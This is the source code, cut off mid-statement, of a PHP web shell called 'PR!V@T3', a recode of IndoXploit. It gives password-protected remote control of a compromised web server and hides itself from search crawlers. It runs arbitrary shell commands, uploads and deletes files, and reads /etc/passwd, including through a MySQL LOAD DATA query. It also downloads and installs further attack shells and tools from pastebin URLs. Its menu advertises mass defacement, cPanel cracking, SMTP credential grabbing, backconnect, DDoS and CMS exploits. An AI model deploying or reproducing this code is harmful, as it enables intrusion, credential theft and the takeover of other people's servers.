PR!V@T3 shell

1. <?php
2. $auth_pass = "39d5b4a1417ba23b28b5a87aae5aa9c0"; // default: pr!v@t3
3. session_start();
4. error_reporting(0);
5. set_time_limit(0);
6. @set_magic_quotes_runtime(0);
7. @clearstatcache();
8. @ini_set('error_log',NULL);
9. @ini_set('log_errors',0);
10. @ini_set('max_execution_time',0);
11. @ini_set('output_buffering',0);
12. @ini_set('display_errors', 0);
13.  
14. if(isset($_GET['bom'])){
15. $color = "#00ff00";
16. $default_action = 'Files';
17. $default_use_ajax = true;
18. $default_charset = 'UTF-8';
19. if(!empty($_SERVER['HTTP_USER_AGENT'])) {
20. $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
21. if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
22. header('HTTP/1.0 404 Not Found');
23. exit;
24. }
25. }
26.  
27. function login_shell() {
28. ?>
29. <html>
30. <head>
31. <title>PR!V@T3</title>
32. <style type="text/css">
33. html {
34. margin:0;
35. background-color: black;
36. color: green;
37. cursor:crosshair;
38. }
39. header {
40. color: green;
41. margin: 10px auto;
42. cursor:crosshair;
43. }
44. input[type=password] {
45. width: 250px;
46. height: 25px;
47. color: red;
48. background: #000000;
49. border: 1px solid #ffffff;
50. padding: 5px;
51. margin-left: 20px;
52. text-align: center;
53. cursor:crosshair;
54. }
55. #logo1{
56. text-align:center;
57. padding-left:50px;
58. color:red;
59. }
60. </style>
61. </head>
62. <pre id="logo1"><strong>
63. #
64. # ,--. ,--. ,---.,-----.,--. ,--.,--------. ,---. ,------. ,-----.
65. # | ,'.| | / || .--'| '--' |'--. .--' ,-----. ' .-' | .---'' .--./
66. # | |' ' |/ ' |'--. `\| .--. | | | '-----' `. `-. | `--, | |
67. # | | ` |'--| |.--' /| | | | | | .-' || `---.' '--'\
68. # `--' `--' `--'`----' `--' `--' `--' `-----' `------' `-----'
69. # ,--. ,--. ,--. ,--. ,--.,--. ,--. ,--.
70. # | | | | ,---. | |-. ,---. | ,---. ,---. | || | ,--. ,--./ | / |
71. # | |.'.| || .-. :| .-. '( .-' | .-. || .-. :| || | \ `' / `| | `| |
72. # | ,'. |\ --.| `-' |.-' `)| | | |\ --.| || | \ / | |.--.| |
73. # '--' '--' `----' `---' `----' `--' `--' `----'`--'`--' `--' `--''--'`--'
74. #
75. </strong></pre>
76. <form method="post">
77. <center><input type="password" name="pass"><center>
78. </form>
79. <br>
80. <center><?php echo " Copyright &copy; ".date('Y')." - pr!v@t3"; ?></center>
81. <?php
82. exit;
83. }
84. if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
85. if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
86. $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
87. else
88. login_shell();
89.  
90. if(isset($_GET['file']) && ($_GET['file'] != '') && ($_GET['act'] == 'download')) {
91. @ob_clean();
92. $file = $_GET['file'];
93. header('Content-Description: File Transfer');
94. header('Content-Type: application/octet-stream');
95. header('Content-Disposition: attachment; filename="'.basename($file).'"');
96. header('Expires: 0');
97. header('Cache-Control: must-revalidate');
98. header('Pragma: public');
99. header('Content-Length: ' . filesize($file));
100. readfile($file);
101. exit;
102. }
103. ?>
104. <html>
105. <head>
106. <title>PR!V@T3</title>
107. <meta name='name' content='PR!V@T3 shell v1.1'>
108. <meta name='name' content='n45ht shell v1.1'>
109. <meta name='author' content='FRU_403'>
110. <meta name='author' content='FRU_403 From Storm Cyber Army - N45HT'>
111. <meta name='info' content='IndoXploit WebShell Recoded By FRU_403'>
112. <meta name='Thanks' content='Extreme Crew - Storm Cyber Army - IndoXploit - Mr.P-teo - BackBox Team - N45HT - iTeens - Defacer Tersakiti Team'>
113. <meta charset="UTF-8">
114. <style type='text/css'>
115. html {
116. background-color:black;
117. font-family: 'Ubuntu';
118. font-size: 13px;
119. width: 100%;
120. cursor:crosshair;
121. }
122. li {
123. display: inline;
124. cursor:crosshair;
125. }
126. table, th, td {
127. border-collapse:collapse;
128. font-family: Tahoma, Geneva, sans-serif;
129. background: transparent;
130. cursor:crosshair;
131. }
132. .table_home, .th_home, .td_home {
133. border: 1px solid white;
134. cursor:crosshair;
135. }
136. th {
137. padding: 10px;
138. cursor:crosshair;
139. }
140. a {
141. color: white;
142. text-decoration: none;
143. cursor:crosshair;
144. }
145. a:hover {
146. color: white;
147. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
148. text-decoration:none;
149. cursor:crosshair;
150. }
151. b {
152. color: white;
153. cursor:crosshair;
154. }
155. input[type=text], input[type=password],input[type=submit] {
156. background: transparent;
157. color: white;
158. border: 1px solid white;
159. margin: 5px auto;
160. padding-left: 5px;
161. font-family: 'Ubuntu';
162. font-size: 13px;
163. cursor:crosshair;
164. }
165. textarea {
166. border: 1px solid white;
167. width: 100%;
168. height: 400px;
169. padding-left: 5px;
170. margin: 10px auto;
171. resize: none;
172. background: transparent;
173. color: white;
174. font-family: 'Ubuntu';
175. font-size: 13px;
176. cursor:crosshair;
177. }
178. select {
179. width: 152px;
180. background: #000000;
181. color: lime;
182. border: 1px solid white;
183. margin: 5px auto;
184. padding-left: 5px;
185. font-family: 'Ubuntu';
186. font-size: 13px;
187. cursor:crosshair;
188. }
189. option:hover {
190. background: lime;
191. color: #000000;
192. cursor:crosshair;
193. }
194. *{
195. text-shadow: 0pt 0pt 0.3em rgb(153, 153, 153);
196. font-size:11px;
197. font-family:Tahoma,Verdana,Arial;
198. color:white;
199. cursor:crosshair;
200. }
201. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid white; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px white;-moz-box-shadow: 0px 4px 2px white;}
202. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: white;font-size:25px;text-shadow: 5px 5px 5px black;}
203. .infoweb {
204. border-right: 1px solid green;
205. cursor:crosshair;
206. }
207. a:hover{
208. text-decoration:none;
209. cursor:crosshair;
210. }
211. div #menu li:hover {cursor:pointer;
212. cursor:crosshair;
213. }
214. div#menu ul {
215. margin:1px 1px 1px 1px;padding:0;float:left;
216. cursor:crosshair;
217. }
218. div#menu li {
219. position:relative;display:block;float:left;
220. cursor:crosshair;
221. }
222. div#menu li:hover>ul {
223. left:0px;
224. cursor:crosshair;
225. }
226. div#menu a{
227. margin:1px 1px 1px 1px;padding:0;float:left;-moz-border-radius: 6px; border-radius: 12px; border:1px solid white;display:block;float:left;padding:4px 6px;margin:0 6px 0 0;text-decoration:none;letter-spacing:3px;color:white;
228. cursor:crosshair;
229. }
230. div#menu a:hover{
231. text-shadow: 0pt 1pt 0.1em rgb(255, 255, 255);
232. text-decoration:none;
233. cursor:crosshair;
234. }
235. div#menu ul ul {
236. margin:2px 1px 1px 1px;float:left;position:absolute;top:20px;left:-990em;width:140px;padding:5px 0 5px 0;background:none;
237. cursor:crosshair;
238. }
239. div#menu ul ul a {
240. margin-top:1px;padding:1px 1px 1px 1px;height:20px;float:none;display:block;color:white;
241. cursor:crosshair;
242. }
243. .output {
244. margin:auto;border:2px solid white;width:100%;height:400px;background:none;padding:0 2px;
245. cursor:crosshair;
246. }
247. .cmdbox {
248. width:100%;
249. cursor:crosshair;
250. }
251. </style>
252. </head>
253. <?php
254.  
255. function w($dir,$perm) {
256. if(!is_writable($dir)) {
257. return "<font color=red>".$perm."</font>";
258. } else {
259. return "<font color=lime>".$perm."</font>";
260. }
261. }
262. function r($dir,$perm) {
263. if(!is_readable($dir)) {
264. return "<font color=red>".$perm."</font>";
265. } else {
266. return "<font color=lime>".$perm."</font>";
267. }
268. }
269. function exe($cmd) {
270. if(function_exists('system')) {
271. @ob_start();
272. @system($cmd);
273. $buff = @ob_get_contents();
274. @ob_end_clean();
275. return $buff;
276. } elseif(function_exists('exec')) {
277. @exec($cmd,$results);
278. $buff = "";
279. foreach($results as $result) {
280. $buff .= $result;
281. } return $buff;
282. } elseif(function_exists('passthru')) {
283. @ob_start();
284. @passthru($cmd);
285. $buff = @ob_get_contents();
286. @ob_end_clean();
287. return $buff;
288. } elseif(function_exists('shell_exec')) {
289. $buff = @shell_exec($cmd);
290. return $buff;
291. }
292. }
293. function perms($file){
294. $perms = fileperms($file);
295. if (($perms & 0xC000) == 0xC000) {
296. // Socket
297. $info = 's';
298. } elseif (($perms & 0xA000) == 0xA000) {
299. // Symbolic Link
300. $info = 'l';
301. } elseif (($perms & 0x8000) == 0x8000) {
302. // Regular
303. $info = '-';
304. } elseif (($perms & 0x6000) == 0x6000) {
305. // Block special
306. $info = 'b';
307. } elseif (($perms & 0x4000) == 0x4000) {
308. // Directory
309. $info = 'd';
310. } elseif (($perms & 0x2000) == 0x2000) {
311. // Character special
312. $info = 'c';
313. } elseif (($perms & 0x1000) == 0x1000) {
314. // FIFO pipe
315. $info = 'p';
316. } else {
317. // Unknown
318. $info = 'u';
319. }
320. // Owner
321. $info .= (($perms & 0x0100) ? 'r' : '-');
322. $info .= (($perms & 0x0080) ? 'w' : '-');
323. $info .= (($perms & 0x0040) ?
324. (($perms & 0x0800) ? 's' : 'x' ) :
325. (($perms & 0x0800) ? 'S' : '-'));
326. // Group
327. $info .= (($perms & 0x0020) ? 'r' : '-');
328. $info .= (($perms & 0x0010) ? 'w' : '-');
329. $info .= (($perms & 0x0008) ?
330. (($perms & 0x0400) ? 's' : 'x' ) :
331. (($perms & 0x0400) ? 'S' : '-'));
332. // World
333. $info .= (($perms & 0x0004) ? 'r' : '-');
334. $info .= (($perms & 0x0002) ? 'w' : '-');
335. $info .= (($perms & 0x0001) ?
336. (($perms & 0x0200) ? 't' : 'x' ) :
337. (($perms & 0x0200) ? 'T' : '-'));
338. return $info;
339. }
340. function hdd($s) {
341. if($s >= 1073741824)
342. return sprintf('%1.2f',$s / 1073741824 ).' GB';
343. elseif($s >= 1048576)
344. return sprintf('%1.2f',$s / 1048576 ) .' MB';
345. elseif($s >= 1024)
346. return sprintf('%1.2f',$s / 1024 ) .' KB';
347. else
348. return $s .' B';
349. }
350. function ambilKata($param, $kata1, $kata2){
351. if(strpos($param, $kata1) === FALSE) return FALSE;
352. if(strpos($param, $kata2) === FALSE) return FALSE;
353. $start = strpos($param, $kata1) + strlen($kata1);
354. $end = strpos($param, $kata2, $start);
355. $return = substr($param, $start, $end - $start);
356. return $return;
357. }
358. function getsource($url) {
359. $curl = curl_init($url);
360. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
361. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
362. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
363. curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
364. $content = curl_exec($curl);
365. curl_close($curl);
366. return $content;
367. }
368. function bing($dork) {
369. $npage = 1;
370. $npages = 30000;
371. $allLinks = array();
372. $lll = array();
373. while($npage <= $npages) {
374. $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage);
375. if($x) {
376. preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
377. foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
378. $npage = $npage + 10;
379. if (preg_match("(first=" . $npage . "&amp)siU", $x, $linksuiv) == 0) break;
380. } else break;
381. }
382. $URLs = array();
383. foreach($allLinks as $url){
384. $exp = explode("/", $url);
385. $URLs[] = $exp[2];
386. }
387. $array = array_filter($URLs);
388. $array = array_unique($array);
389. $sss = count(array_unique($array));
390. foreach($array as $domain) {
391. echo $domain."\n";
392. }
393. }
394. function reverse($url) {
395. $ch = curl_init("http://domains.yougetsignal.com/domains.php");
396. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
397. curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");
398. curl_setopt($ch, CURLOPT_HEADER, 0);
399. curl_setopt($ch, CURLOPT_POST, 1);
400. $resp = curl_exec($ch);
401. $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
402. $array = explode(",,", $resp);
403. unset($array[0]);
404. foreach($array as $lnk) {
405. $lnk = "http://$lnk";
406. $lnk = str_replace(",", "", $lnk);
407. echo $lnk."\n";
408. ob_flush();
409. flush();
410. }
411. curl_close($ch);
412. }
413. if(get_magic_quotes_gpc()) {
414. function ec_ss($array) {
415. return is_array($array) ? array_map('ec_ss', $array) : stripslashes($array);
416. }
417. $_POST = ec_ss($_POST);
418. $_COOKIE = ec_ss($_COOKIE);
419. }
420. function BuatTools($names,$lokasi){
421. if ( $_GET['create'] == $names ){
422. $a= "".$_SERVER['SERVER_NAME']."";
423. $b= dirname($_SERVER['PHP_SELF']);
424. $c = "/priv_tools/".$names.".php";
425. if (file_exists('priv_tools/'.$names.'.php')){
426. echo '<script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';
427. }
428. else {mkdir("priv_tools", 0777);
429. file_put_contents('priv_tools/'.$names.'.php', file_get_contents($lokasi));
430. echo ' <script type="text/javascript">alert("Done");window.location.href = "priv_tools/'.$names.'.php";</script> ';}}}
431.  
432. BuatTools("wso","http://pastebin.com/raw/3eh3Gej2");
433. BuatTools("adminer"."https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php");
434. BuatTools("b374k","http://pastebin.com/raw/rZiyaRGV");
435. BuatTools("injection","http://pastebin.com/raw/nxxL8c1f");
436. BuatTools("promailerv2","http://pastebin.com/raw/Rk9v6eSq");
437. BuatTools("gamestopceker","http://pastebin.com/raw/QSnw1JXV");
438. BuatTools("bukapalapak","http://pastebin.com/raw/6CB8krDi");
439. BuatTools("tokopedia","http://pastebin.com/dvhzWgby");
440. BuatTools("encodedecode","http://pastebin.com/raw/wqB3G5eZ");
441. BuatTools("mailer","http://pastebin.com/raw/9yu1DmJj");
442. BuatTools("r57","http://pastebin.com/raw/G2VEDunW");
443. BuatTools("tokenpp","http://pastebin.com/raw/72xgmtPL");
444. BuatTools("extractor","http://pastebin.com/raw/jQnMFHBL");
445. BuatTools("bh","http://pastebin.com/raw/3L2ESWeu");
446. BuatTools("dhanus","http://pastebin.com/raw/v4xGus6X");
447.  
448. if(isset($_GET['folder'])) {
449. $dir = $_GET['folder'];
450. chdir($dir);
451. } else {
452. $dir = getcwd();
453. }
454. $kernel = php_uname();
455. $ip = gethostbyname($_SERVER['HTTP_HOST']);
456. $dir = str_replace("\\","/",$dir);
457. $scdir = explode("/", $dir);
458. $freespace = hdd(disk_free_space("/"));
459. $total = hdd(disk_total_space("/"));
460. $used = $total - $freespace;
461. $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
462. $ds = @ini_get("disable_functions");
463. $mysql = (function_exists('mysql_connect')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
464. $curl = (function_exists('curl_version')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
465. $wget = (exe('wget --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
466. $perl = (exe('perl --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
467. $python = (exe('python --help')) ? "<font style='color:lime'>ON</font>" : "<font style='color:red'>OFF</font>";
468. $show_ds = (!empty($ds)) ? "<font style='color:red'>$ds</font>" : "<font style='color:lime'>ON</font>";
469. if(!function_exists('posix_getegid')) {
470. $user = @get_current_user();
471. $uid = @getmyuid();
472. $gid = @getmygid();
473. $group = "?";
474. } else {
475. $uid = @posix_getpwuid(posix_geteuid());
476. $gid = @posix_getgrgid(posix_getegid());
477. $user = $uid['name'];
478. $uid = $uid['uid'];
479. $group = $gid['name'];
480. $gid = $gid['gid'];
481. }
482. $d0mains = @file("/etc/named.conf");
483. $users=@file('/etc/passwd');
484. if($d0mains)
485. {
486. $count;
487. foreach($d0mains as $d0main)
488. {
489. if(@ereg("zone",$d0main))
490. {
491. preg_match_all('#zone "(.*)"#', $d0main, $domains);
492. flush();
493. if(strlen(trim($domains[1][0])) > 2)
494. {
495. flush();
496. $count++;
497. }
498. }
499. }
500. }
501. $port=$_SERVER['SERVER_PORT'];
502. echo "<table>";
503. echo "<td class=infoweb>";
504. echo "System: <font color=lime>".$kernel."</font><br>";
505. echo "User: <font color=lime>".$user."</font> (".$uid.") Group: <font color=lime>".$group."</font> (".$gid.")<br>";
506. echo "HDD: <font color=lime>$used</font> / <font color=lime>$total</font> ( Free: <font color=lime>$freespace</font> )<br>";
507. echo "Websites :<font color=lime> $count </font> Domains <br>";
508. echo "Port :<font color=lime> $port</font> <br>";
509. echo "Safe Mode: $sm<br>";
510. echo "Disable Functions: $show_ds<br>";
511. echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
512. echo "Current DIR: ";
513. foreach($scdir as $c_dir => $cdir) {
514. echo "<a href='?bom&folder=";
515. for($i = 0; $i <= $c_dir; $i++) {
516. echo $scdir[$i];
517. if($i != $c_dir) {
518. echo "/";
519. }
520. }
521. echo "'>$cdir</a>/";
522. }
523. echo "&nbsp;&nbsp;[ ".w($dir, perms($dir))." ]";
524. echo "</td><td style='width:13.5%'>";
525. echo "&nbsp;Server IP: <font color=lime>".$ip."</font><br>&nbsp;Your IP: <font color=lime>".$_SERVER['REMOTE_ADDR']."</font>";
526. echo "<br><br>";
527. echo " &nbsp;<a href='?bom' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>
528. &nbsp;<a href='?bom&do=kill' style='border:1px solid white;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>
529. &nbsp;<a href='?bom&logout=true' style='color:red;border:1px solid white;width:90px;margin:0px;padding:0px 8px 0px 8px;'>LOGOUT</a>
530. &nbsp";
531. echo "</td></table>";
532. echo "<hr>";
533. echo "
534. <table>
535. <tr>
536. <div id='menu'>
537. <ul class=menu>
538. <li><a href='?bom&folder=$dir'>Files</a></li>
539. <li><a href='?bom&folder=$dir&do=cmd'>Command</a></li>
540. <li><a>Config & Symlink</a>
541. <ul>
542. <li><a href='?bom&folder=$dir&do=config' style='background-color:black'>&nbsp;Config</a></li>
543. <li><a href='?bom&folder=$dir&do=lcf' style='background-color:black'>&nbsp;LiteSpeed</a></li>
544. <li><a href='?bom&folder=$dir&do=convh' style='background-color:black'>&nbsp;Config vhosts</a></li>
545. <li><a href='?bom&folder=$dir&do=symser' style='background-color:black'>&nbsp;Symlink Server</a></li>
546. </ul>
547. </li>
548. <li><a>Mass</a>
549. <ul>
550. <li><a href='?bom&folder=$dir&do=mass_mail' style='background:black'>&nbsp;Mass Mailer</a></li>
551. <li><a href='?bom&folder=$dir&do=mass_deface' style='background:black'>&nbsp;Mass Deface</a></li>
552. <li><a href='?bom&folder=$dir&do=mass_helper' style='background:black'>&nbsp;Mass Helper</a></li>
553. <li><a href='?bom&folder=$dir&do=mass_delete' style='background:black'>&nbsp;Mass Delete</a></li>
554. </ul>
555. </li>
556. <li><a href='?bom&folder=$dir&do=domains'>Domains</a></li>
557. <li><a href='?bom&folder=$dir&do=upload'>Upload</a></li>
558. <li><a>Grab/Crack</a>
559. <ul>
560. <li><a href='?bom&folder=$dir&do=cpanel' style='background-color:black'>&nbsp;Cpanel Cracker</a></li>
561. <li><a href='?bom&folder=$dir&do=smtp' style='background-color:black'>&nbsp;SMTP Grabber</a></li>
562. </ul>
563. </li>
564. <li><a>Bypass</a>
565. <ul>
566. <li><a href='?bom&folder=$dir&do=etcpler' style='background-color:black'>&nbsp;etc/passw</a></li>
567. <li><a href='?bom&folder=$dir&do=bypass' style='background-color:black'>&nbsp;Disable&nbsp;Functions</a></li>
568. </ul>
569. </li>
570. <li><a>Auto Tools</a>
571. <ul>
572. <li><a href='?bom&folder=$dir&do=auto_edit_user' style='background-color:black'>&nbsp;Auto Edit User</a></li>
573. <li><a href='?bom&folder=$dir&do=auto_wp' style='background-color:black'>&nbsp;Auto WordPress</a></li>
574. <li><a href='?bom&folder=$dir&do=auto_dwp' style='background-color:black'>&nbsp;Auto Deface WP</a></li>
575. <li><a href='?bom&folder=$dir&do=auto_dwp2' style='background-color:black'>&nbsp;Deface WP v.2</a></li>
576. </ul>
577. </li>
578. <li><a>Tools</a>
579. <ul>
580. <li><a href='?bom&folder=$dir&do=fake_root' style='background-color:black'>&nbsp;Fake Root</a></li>
581. <li><a href='?bom&folder=$dir&do=network' style='background-color:black'>&nbsp;Backconnect</a></li>
582. <li><a href='?bom&folder=$dir&do=mysql' style='background-color:black'>&nbsp;Mysql Interface</a></li>
583. <li><a href='?bom&folder=$dir&do=adminer' style='background-color:black'>&nbsp;Adminer</a></li>
584. <li><a href='?bom&folder=$dir&do=cgi' style='background-color:black'>&nbsp;Cgi Telnet</a></li>
585. <li><a href='?bom&folder=$dir&do=zoneh' style='background-color:black'>&nbsp;Zone-H</a></li>
586. <li><a href='?bom&folder=$dir&do=defacerid' style='background-color:black'>&nbsp;Defacer.id</a></li>
587. </ul>
588. <li><a>Tools V2</a>
589. <ul>
590. <li><a href='?bom&folder=$dir&do=boom' style='background-color:black'>&nbsp;Ngindex</a></li>
591. <li><a href='?bom&folder=$dir&do=jumping' style='background-color:black'>&nbsp;Jumping</a></li>
592. <li><a href='?bom&folder=$dir&do=ddos' style='background-color:black'>&nbsp;DDOS Attack</a></li>
593. <li><a href='?bom&folder=$dir&do=lh' style='background-color:black'>&nbsp;Log Hunter</a></li>
594. <li><a href='?bom&folder=$dir&do=sc' style='background-color:black'>&nbsp;Shell Checker</a></li>
595. <li><a href='?bom&folder=$dir&do=sf' style='background-color:black'>&nbsp;Shell Finder</a></li>
596. </ul>
597. </li>
598. <li><a href='?bom&folder=$dir&do=rdp'>Create RDP</a></li>
599. <li><a>Exploit</a>
600. <ul>
601. <li><a href='?bom&folder=$dir&do=lokmed_login_shell' style='background-color:black'>&nbsp;Lokomedia</a></li>
602. <li><a href='?bom&folder=$dir&do=sqli_scanner' style='background-color:black'>&nbsp;SQLI Scanner</a></li>
603. <li><a href='?bom&folder=$dir&do=popoji_add_admin' style='background-color:black'>&nbsp;Popoji</a></li>
604. <li><a href='?bom&folder=$dir&do=tevolution' style='background-color:black'>&nbsp;Tevolution</a></li>
605. <li><a href='?bom&folder=$dir&do=u-design_exploit' style='background-color:black'>&nbsp;U-Design</a></li>
606. <li><a href='?bom&folder=$dir&do=u-design_dorker' style='background-color:black'>&nbsp;U-Design Dorker</a></li>
607. <li><a href='?bom&folder=$dir&do=magento' style='background-color:black'>&nbsp;Magento</a></li>
608. </ul>
609. </li>
610. <li><a>Exploits</a>
611. <ul>
612. <li><a href='?bom&folder=$dir&do=drupal' style='background-color:black'>&nbsp;Drupal Mass</a></li>
613. <li><a href='?bom&folder=$dir&do=binchecker' style='background-color:black'>&nbsp;Checker</a></li>
614. </ul>
615. </li>
616. <li><a>Encrypter</a>
617. <ul>
618. <li><a href='?bom&folder=$dir&do=hash' style='background-color:black'>&nbsp;Hash</a></li>
619. <li><a href='?bom&folder=$dir&do=string' style='background-color:black'>&nbsp;Encoder&Decoder</a></li>
620. </ul>
621. </li>
622. <li><a href='?bom&folder=$dir&do=tentang' style='background-color:black'>&nbsp;About</a></li>
623. </ul>
624. </div></tr><br><br>";
625. echo "<hr>";
626. echo "<table>";
627. if($_GET['logout'] == true) {
628. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
629. echo "<script>window.location='?';</script>";
630. } elseif($_GET['do'] == 'upload') {
631. echo "<center>";
632. if($_POST['upload']) {
633. if($_POST['tipe_upload'] == 'biasa') {
634. if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
635. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
636. } else {
637. $act = "<font color=red>failed to upload file</font>";
638. }
639. } else {
640. $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
641. $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
642. if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
643. if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
644. $act = "<br><font color=lime>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
645. } else {
646. $act = "<font color=red>failed to upload file</font>";
647. }
648. } else {
649. $act = "<font color=red>failed to upload file</font>";
650. }
651. }
652. }
653. echo "Upload File:
654. <form method='post' enctype='multipart/form-data'>
655. <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
656. <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
657. <input type='file' name='ix_file'>
658. <input type='submit' value='upload' name='upload'>
659. </form>";
660. echo $act;
661. echo "</center>";
662. } elseif($_GET['do'] == 'kill') {
663. if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
664. die('<center><br><center><h2>Shell removed</h2><br>Goodbye , Thanks for take my shell today</center></center>');
665. else
666. echo '<center>unlink failed!</center>';
667. } elseif($_GET['do'] == 'mysql'){if(isset($_GET['sqlhost']) && isset($_GET['sqluser']) && isset($_GET['sqlpass']) && isset($_GET['sqlport'])){$sqlhost = $_GET['sqlhost'];$sqluser = $_GET['sqluser'];$sqlpass = $_GET['sqlpass'];$sqlport = $_GET['sqlport'];if($con = @mysql_connect($sqlhost.":".$sqlport,$sqluser,$sqlpass)){$msg .= "<div style='width:99%;padding:4px 10px 0 10px;'>";$msg .= "<p>Connected to ".$sqluser."<span class='gaya'>@</span>".$sqlhost.":".$sqlport;$msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;'>[ databases ]</a>";if(isset($_GET['db'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."'>".htmlspecialchars($_GET['db'])."</a>";if(isset($_GET['table'])) $msg .= "&nbsp;&nbsp;<span class='gaya'>-&gt;</span>&nbsp;&nbsp;<a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$_GET['db']."&amp;table=".$_GET['table']."'>".htmlspecialchars($_GET['table'])."</a>";$msg .= "</p><p>version : ".mysql_get_server_info($con)." proto ".mysql_get_proto_info($con)."</p>";$msg .= "</div>";echo $msg;if(isset($_GET['db']) && (!isset($_GET['table'])) && (!isset($_GET['sqlquery']))){$db = $_GET['db'];$query = "DROP TABLE IF EXISTS b374k_table;\nCREATE TABLE `b374k_table` ( `file` LONGBLOB NOT NULL );\nLOAD DATA INFILE '/etc/passwd'\nINTO TABLE b374k_table;SELECT * FROM b374k_table;\nDROP TABLE IF EXISTS b374k_table;";$msg = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'><input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>$query</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$tables = array();$msg .= "<table class='explore' style='width:99%;'><tr><th>available tables on ".$db."</th></tr>";$hasil = @mysql_list_tables($db,$con);
668. while(list($table) = @mysql_fetch_row($hasil)){@array_push($tables,$table);} @sort($tables);
669. foreach($tables as $table){$msg .= "<tr><td><a href='?bom&folder=".$dir."&amp;do=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."&amp;table=".$table."'>$table</a></td></tr>";} $msg .= "</table>";}
670. elseif(isset($_GET['table']) && (!isset($_GET['sqlquery']))){
671. $db = $_GET['db'];$table = $_GET['table'];$query = "SELECT * FROM ".$db.".".$table." LIMIT 0,100;";$msgq = "<div style='width:99%;padding:0 10px;'><form action='?' method='get'> <input type='hidden' name='y' value='".$dir."' /> <input type='hidden' name='x' value='mysql' /> <input type='hidden' name='sqlhost' value='".$sqlhost."' /> <input type='hidden' name='sqluser' value='".$sqluser."' /> <input type='hidden' name='sqlport' value='".$sqlport."' /> <input type='hidden' name='sqlpass' value='".$sqlpass."' /> <input type='hidden' name='db' value='".$db."' /> <input type='hidden' name='table' value='".$table."' /> <p><textarea name='sqlquery' class='output' style='width:98%;height:80px;'>".$query."</textarea></p> <p><input class='inputzbut' style='width:80px;' name='submitquery' type='submit' value='Go !' /></p> </form></div> ";$columns = array();$msg = "<table class='explore' style='width:99%;'>";$hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);while(list($column) = 